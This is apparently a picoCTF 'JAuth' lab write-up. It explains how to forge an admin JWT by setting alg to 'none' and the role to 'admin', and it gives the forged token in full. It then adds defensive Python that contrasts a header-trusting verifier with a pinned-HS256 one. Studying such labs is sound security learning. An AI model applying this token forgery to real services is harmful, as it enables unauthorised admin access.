JAuth

Challenge Overview

Description
Most web application developers use third party components without testing their security. Some of the past affected companies are:

  • Equifax (a US credit bureau organization) - breach due to unpatched Apache Struts web framework CVE-2017-5638
  • Mossack Fonseca (Panama Papers law firm) breach - unpatched version of Drupal CMS used
  • VerticalScope (internet media company) - outdated version of vBulletin forum software used

Can you identify the components and exploit the vulnerable one?

The website is running here. Can you become an admin?

You can login as test with the password Test123! to get started.

Solution

To start, open the browser developer tools, go to Application, then Cookies, to see the cookies set by the site. After logging in with the test credentials a new JWT (JSON Web Token) cookie appears:

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhdXRoIjoxNzA5NjE3NTUzMDg4LCJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMjIuMC4wLjAgU2FmYXJpLzUzNy4zNiIsInJvbGUiOiJ1c2VyIiwiaWF0IjoxNzA5NjE3NTUzfQ.Wqcg2Ywm6ZPT7bcEGuBs01lhvU_I3VQ2HOG7772H-eU

The . is the separator, so it can be seen that there are three parts: first the header, then the payload, and lastly the signature. The first two are base64url-encoded JSON, so they can be decoded with CyberChef.

Part 1:

Base64: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9

Decoded: {"typ":"JWT","alg":"HS256"}

Part 2:

Base64: eyJhdXRoIjoxNzA5NjE3NTUzMDg4LCJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMjIuMC4wLjAgU2FmYXJpLzUzNy4zNiIsInJvbGUiOiJ1c2VyIiwiaWF0IjoxNzA5NjE3NTUzfQ

Decoded: {"auth":1709617553088,"agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36","role":"user","iat":1709617553}

Part 3:

Base64: Wqcg2Ywm6ZPT7bcEGuBs01lhvU_I3VQ2HOG7772H-eU

Decoded: Z§ ٌ&é“Óí·àlÓYa½B7U‡8nûïaÞ

The last part is not text at all: it is the raw HMAC-SHA256 signature (the HS256 named in the header) over the first two parts, which is why decoding it outputs a weird value.

Take the second part's decoded JSON, change the role from user to admin, and base64-encode it again in CyberChef to get a new payload. The first part sets alg to HS256, which is what determines how the third part is computed. By setting alg to none we no longer have to worry about the third part and can leave it blank. So take the first part's decoded output, change HS256 to none, and re-encode it with base64 as well.

Putting the three parts back together with . gives the full JWT cookie with the admin role. Be careful to remove any "=" padding CyberChef adds, because JWT uses unpadded base64url.

eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJhdXRoIjoxNzA5NjE3NTUzMDg4LCJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMjIuMC4wLjAgU2FmYXJpLzUzNy4zNiIsInJvbGUiOiJhZG1pbiIsImlhdCI6MTcwOTYxNzU1M30.

After replacing the cookie value with the modified token and refreshing the page, you get the flag.
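To see the defender's side of this, here is an added Python example (not part of the write-up or the challenge's own code) that decodes the forged cookie from above with the standard library only, then contrasts a verifier that lets the token's own alg header choose the algorithm with one that pins HS256 server-side. The demo key, and the signed token minted with it, are constructed for the example; the challenge's real signing key is not known.

```python
import base64
import hashlib
import hmac
import json

# Forged cookie copied from the write-up above: alg "none", role "admin", empty signature.
FORGED_TOKEN = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0."
    "eyJhdXRoIjoxNzA5NjE3NTUzMDg4LCJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMjIuMC4wLjAgU2FmYXJpLzUzNy4zNiIsInJvbGUiOiJhZG1pbiIsImlhdCI6MTcwOTYxNzU1M30."
)

# Constructed demo secret; the challenge server's real key is unknown.
DEMO_KEY = b"constructed-demo-secret-not-the-real-key"


def b64url_decode(data: str) -> bytes:
    """JWT strips '=' padding; restore it before decoding."""
    return base64.urlsafe_b64decode(data + "=" * (-len(data) % 4))


def b64url_encode(raw: bytes) -> str:
    """Unpadded base64url, as JWT requires."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def split_jwt(token: str):
    """Return (header, payload, signature_bytes, signing_input)."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected header.payload.signature")
    header = json.loads(b64url_decode(parts[0]))
    payload = json.loads(b64url_decode(parts[1]))
    signature = b64url_decode(parts[2])  # b"" for the forged token
    return header, payload, signature, parts[0] + "." + parts[1]


def sign_hs256(signing_input: str, key: bytes) -> bytes:
    """HS256 = HMAC-SHA256 over 'base64url(header).base64url(payload)'."""
    return hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()


def make_hs256_token(payload: dict, key: bytes) -> str:
    """Mint a properly signed HS256 token (demo only)."""
    def enc(obj) -> str:
        return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())
    signing_input = enc({"typ": "JWT", "alg": "HS256"}) + "." + enc(payload)
    return signing_input + "." + b64url_encode(sign_hs256(signing_input, key))


def verify_trusting_header(token: str, key: bytes):
    """Weak pattern: the token's own header picks the algorithm, so an
    attacker-supplied alg "none" skips the signature check entirely.
    Returns the payload when accepted, else None."""
    header, payload, sig, signing_input = split_jwt(token)
    alg = header.get("alg")
    if alg == "none":
        return payload  # no signature check at all: this is the bug
    if alg == "HS256" and hmac.compare_digest(sig, sign_hs256(signing_input, key)):
        return payload
    return None


def verify_strict(token: str, key: bytes):
    """Hardened: the server fixes the algorithm to HS256, rejects any other
    value (including "none"), and compares the HMAC in constant time."""
    header, payload, sig, signing_input = split_jwt(token)
    if header.get("alg") != "HS256":
        return None
    if not hmac.compare_digest(sig, sign_hs256(signing_input, key)):
        return None
    return payload


if __name__ == "__main__":
    hdr, body, _, _ = split_jwt(FORGED_TOKEN)
    print("forged header:", hdr, "role:", body["role"])
    print("lenient verifier accepts forged token:", verify_trusting_header(FORGED_TOKEN, DEMO_KEY) is not None)
    print("strict verifier accepts forged token: ", verify_strict(FORGED_TOKEN, DEMO_KEY) is not None)
    good = make_hs256_token({"role": "user", "iat": 1709617553}, DEMO_KEY)
    print("strict verifier accepts signed token, role:", verify_strict(good, DEMO_KEY)["role"])
```

The fix is in verify_strict: the expected algorithm is a server-side constant, never read from untrusted input, and an unsigned token is rejected before any claim such as role is looked at. Most JWT libraries expose the same control as an explicit allowed-algorithms setting, which should be pinned rather than left to the token.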

Flag: picoCTF{succ3ss_@u7h3nt1c@710...4eacf}